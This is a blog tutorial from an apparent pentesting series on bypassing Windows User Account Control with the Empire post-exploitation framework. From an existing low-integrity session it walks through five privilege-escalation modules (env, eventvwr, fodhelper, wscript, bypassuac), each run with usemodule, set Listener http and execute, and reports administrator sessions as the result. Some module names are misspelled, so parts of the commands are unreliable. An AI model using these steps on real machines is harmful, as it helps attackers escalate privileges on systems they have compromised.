Bypass User Access Control using Empire

at 1:51 AM Saturday, March 9, 2019

Bypass User Access Control using Empire
This is fifth article in our empire series, for the basic guide to empire click here. In this article, we will learn to bypass administrator privileges using various bypassuac post exploitation methods. UAC stands for User Account Control, which means which user has how many rights to make changes in the system. The rights given too a user depends on the integrity levels; which are :
·        High : Administrator rights
·        Medium : Standard user rights
·        Low : Extremely restricted

We try and gain the highest integrity that is indicated by the number 1. Let’s start with the first exploit i.e. bypassuac_env. Now, as you can see in the image, we already have an empire session with the integrity of 0, which means we do not have admin right. So type the following set of commands to get administrator privileges :
usemodule privsec/bypassuac_env
set Listener http
execute
Executing the above module will give you a new session. Upon accessing the said session you can see the integrity has to changed to 1, which means no we have administrator rights, just as shown in the image below :


Now, let’s try another exploit which is privsec/bypassuac_eventvwr. The function of this module is the same as before i.e. to get administrator rights so we can attack more effectively. Again, as you can see, we have the session with the integrity of 0 which indicates we have no admin rights yet. So, run the following commands :
usemodule privsec/bypassuac_eventvwr
set Listener http
execute
As you can see, we have a new session with the integrity of 1 which confirms that we now have admin rights.


The next module we will use for the same purpose is privesc/bypassuac_fodhelper. Therefore just like before use the following set of commands :
usemodule privesc/bypassuac_fodhelper
set Listener http
execute
Once the module is executed, you will have the session with the integrity of 1, hence we are successful in attaining the admin rights.


Next bypassuac module we will use is privesc/bypassuac_wscript. And similarly, to have administrator privileges use the following commands :
usemodule privesc/bypassuaca_wscript
set Listener http
execute
As you can see in the image, the new session that we have gained is with admin rights.


The last module we will use for the same purpose is privesc/bypassuac. To execute the following 
commands :
usemodule privesc/bypassuac
set Listener http
execute


As you can see in the image above, the new session gained has the integrity of 1 hence the administrator rights are gained.

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)